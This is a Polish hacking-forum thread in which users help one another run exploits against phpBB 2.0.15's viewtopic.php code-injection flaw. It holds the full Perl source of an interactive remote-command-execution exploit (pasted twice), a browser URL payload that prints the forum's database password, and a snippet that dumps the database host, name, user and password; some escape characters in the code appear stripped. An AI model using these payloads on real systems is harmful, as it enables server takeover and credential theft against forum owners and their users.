phpbb2_0_15

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
A wiec podczas kompilowania exploitow na php 2.0.15 wystepuja bledy a u innych dzialaja , jaka moze byc tego przyczyna ?? :[
Przeddstawia krok po kroku co robie i jakie bledy mi wywala :
I exploit:
Kod:
Password:

linux:~ # cd /home/_sN4kE

linux:/home/_sN4kE # chmod +x phpbb2_0_15.pl

linux:/home/_sN4kE # ./phpbb2_0_15.pl [url]http://www.example.com/forum/viewtopic=8[/url]

": No such file or directory.

Use -S to search $PATH for it.

linux:/home/_sN4kE #
II exploit:
Kod:
Password:

linux:~ # cd /home/_sN4kE

linux:/home/_sN4kE # chmod +x ble.pl

linux:/home/_sN4kE # ./ble.pl [url]http://www.example.com/forum/viewtopic=8[/url]

./ble.pl: line 22: use: command not found

./ble.pl: line 23: use: command not found

./ble.pl: line 25: syntax error near unexpected token `$ARGV[0]'

./ble.pl: line 25: `unless ($ARGV[0]) { print "$0 <viewtopic url>n"; exit(1); }'

linux:/home/_sN4kE #
Bardzo prosilbym o jak najszybsza odpowiedz :| . Z gory thx
smile.gif
.
 

mauroni

Użytkownik
Dołączył
Sierpień 12, 2004
Posty
5
Podaj ktorego exploita kompilujesz, w niektorych z tego co sie orientuje trzeba cos pozmieniac
<

A swoja droga to wystarczy obadac zrodlo kodu aby bylo widac jak mozemy go uzyc
smile.gif

np.
viewtopic.php?t=NUMERPOSTU&highlight='.printf($dbpasswd).'
zczyta nam zmienna $dbpasswd czyli haslo do bazy danych...
Nalezy pamietac ze luka ta dziala tylko na phpbb 2.0.15 i na wczesniejszych nie zadziala
<
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by mauroni
Podaj ktorego exploita kompilujesz, w niektorych z tego co sie orientuje trzeba cos pozmieniac
<

A swoja droga to wystarczy obadac zrodlo kodu aby bylo widac jak mozemy go uzyc
smile.gif

np.
viewtopic.php?t=NUMERPOSTU&highlight='.printf($dbpasswd).'
zczyta nam zmienna $dbpasswd czyli haslo do bazy danych...
Nalezy pamietac ze luka ta dziala tylko na phpbb 2.0.15 i na wczesniejszych nie zadziala
<
Pisze ze wykorzystanie do exploitu wyglada tak:
./phpbb2_0_15.pl www.strona.pl/viewtopic=numer
I na wczesniejszych forach tez dziala =] bo jak blad jest wykryty w wersji najnowszej to w wersjach starszych rowniez istanieje ten blad =] .
edit:
zrodlo exploita wyglada tak:
exploit I
Kod:
#!/usr/bin/perl 

# Wed Jun 29 19:08:04 CEST 2005 [email][email protected][/email]

#

# phpBB 2.0.15 -re-bug in viewtopic.php

# The complete Open Source Development with CVS: GNU General Public License

# Book on using CVS effectively  <---------  cvs, is also GPL

# or [url]http://www.google.es/search?q=programming+howto[/url]

# 

# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!

# 

# 

# Example: ./phpbb2_0_15.pl [url]http://www.server.com/viewtopic.php?t=1[/url]

# You can start typing commands.

# Tested in BSD. Theo.. it works!

#

# !dSR: que todos los hackers digan YO!!

#

# 

 



use strict;

use IO::Socket;



unless ($ARGV[0]) { print "$0 <viewtopic url>n"; exit(1); }



$ARGV[0] =~ m!http://(.*?)/(.*?t=d+)!;

my ($server, $port) = split (/:/,$1);

$port   = 80 unless defined($port);

$server  = $1 unless defined($server);

my ($url, $command) = $2;



print "$server - $port - $urln";



while () {

        print "phpBB2.0.15> ";

        while(<STDIN>) {

                $command=$_;

                chomp($command);

                last;

        }

        &send($command);

}



sub send {

    my $ok        =    0;

    my $cmd        = "echo "#PHPBBEXPLOIT#";".$_[0].";echo "#PHPBBEXPLOIT#"";

    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1n".

                    "Host: $servernPHP: $cmdnnnn";

    my $socket = IO::Socket::INET->new(PeerAddr => $server,

                                        PeerPort => $port,

                                        Proto    => "tcp",

                                        Type     => SOCK_STREAM)

                                or die "can't connect to: $server : $@n";

    print $socket $string;

    while(<$socket>) {

        if (/#PHPBBEXPLOIT#/) {

                close($socket) and last if $ok eq 2;

                $ok++;

                next;

        }

        print if $ok eq "1";

    }

}

exit 0;

exploit II:

Kod:
#!/usr/bin/perl 

# Wed Jun 29 19:08:04 CEST 2005 [email][email protected][/email]

#

# phpBB 2.0.15 -re-bug in viewtopic.php

# The complete Open Source Development with CVS: GNU General Public License

# Book on using CVS effectively  <---------  cvs, is also GPL

# or [url]http://www.google.es/search?q=programming+howto[/url]

# 

# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!

# 

# 

# Example: ./phpbb2_0_15.pl [url]http://www.server.com/viewtopic.php?t=1[/url]

# You can start typing commands.

# Tested in BSD. Theo.. it works!

#

# !dSR: que todos los hackers digan YO!!

#

# 

 



use strict;

use IO::Socket;



unless ($ARGV[0]) { print "$0 <viewtopic url>n"; exit(1); }



$ARGV[0] =~ m!http://(.*?)/(.*?t=d+)!;

my ($server, $port) = split (/:/,$1);

$port   = 80 unless defined($port);

$server  = $1 unless defined($server);

my ($url, $command) = $2;



print "$server - $port - $urln";



while () {

        print "phpBB2.0.15> ";

        while(<STDIN>) {

                $command=$_;

                chomp($command);

                last;

        }



        &send($command);

}



sub send {

    my $ok        =    0;

    my $cmd        = "echo "#PHPBBEXPLOIT#";".$_[0].";echo "#PHPBBEXPLOIT#"";

    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1n".

                    "Host: $servernPHP: $cmdnnnn";

    my $socket = IO::Socket::INET->new(PeerAddr => $server,

                                        PeerPort => $port,

                                        Proto    => "tcp",

                                        Type     => SOCK_STREAM)

                                or die "can't connect to: $server : $@n";

    print $socket $string;

    while(<$socket>) {

        if (/#PHPBBEXPLOIT#/) {

                close($socket) and last if $ok eq 2;

                $ok++;

                next;

        }

        print if $ok eq "1";

    }

}

exit 0;
 

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
GreEnSnake: mauroni podał Tobie metode :/ a Ty nadal nie skapowałeś sie
smile.gif

uch biada biada
smile.gif


Pozdrawiam

DJBOSS666
 

DJBOSS666

Użytkownik
Dołączył
Luty 21, 2003
Posty
302
Raczej poptostu wpisać w URL w przeglądarce http://www.example.pl/forum/viewtopic.php?...tf($dbpasswd).'

a t=50 odpowiada istniejącemu jakiemuś postowi na forum
smile.gif
więc nie koniecznie musi to być 50
smile.gif



A tutaj macie komendy z exploita do 2.0.15 które wstawiacie zamiast $dbpasswd.


Kod:
$sploit     = $dir . "viewtopic.php?t=";

$sploit .= $threadid;

$sploit .= "&highlight='.printf($delimit.";

$sploit .= "$dbhost.";

$sploit .= "$delimit.";

$sploit .= "$dbname.";

$sploit .= "$delimit.";

$sploit .= "$dbuser.";

$sploit .= "$delimit.";

$sploit .= "$dbpasswd.";

$sploit .= "$delimit).'";
http://www.milw0rm.com/id.php?id=1080


PS: piewszy i ostani raz pokazuje krok po kroku jak coś zrobić, zrozumcie że jak sami do tego nie dojdziecie, teraz to do żadnego innego exploita nie dojdziecie także nigdy sami.

Pozdrawiam

DJBOSS666
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by DJBOSS666
Raczej poptostu wpisać w URL w przeglądarce http://www.example.pl/forum/viewtopic.php?...tf($dbpasswd).'

a t=50 odpowiada istniejącemu jakiemuś postowi na forum
smile.gif
więc nie koniecznie musi to być 50
smile.gif



A tutaj macie komendy z exploita do 2.0.15 które wstawiacie zamiast $dbpasswd.


Kod:
$sploit     = $dir . "viewtopic.php?t=";

$sploit .= $threadid;

$sploit .= "&highlight='.printf($delimit.";

$sploit .= "$dbhost.";

$sploit .= "$delimit.";

$sploit .= "$dbname.";

$sploit .= "$delimit.";

$sploit .= "$dbuser.";

$sploit .= "$delimit.";

$sploit .= "$dbpasswd.";

$sploit .= "$delimit).'";
http://www.milw0rm.com/id.php?id=1080


PS: piewszy i ostani raz pokazuje krok po kroku jak coś zrobić, zrozumcie że jak sami do tego nie dojdziecie, teraz to do żadnego innego exploita nie dojdziecie także nigdy sami.

Pozdrawiam

DJBOSS666
thx za pomoc boss'ie
smile.gif
nastepnym razem bardziej pokombinuje samemu
smile.gif
.
 
Do góry Bottom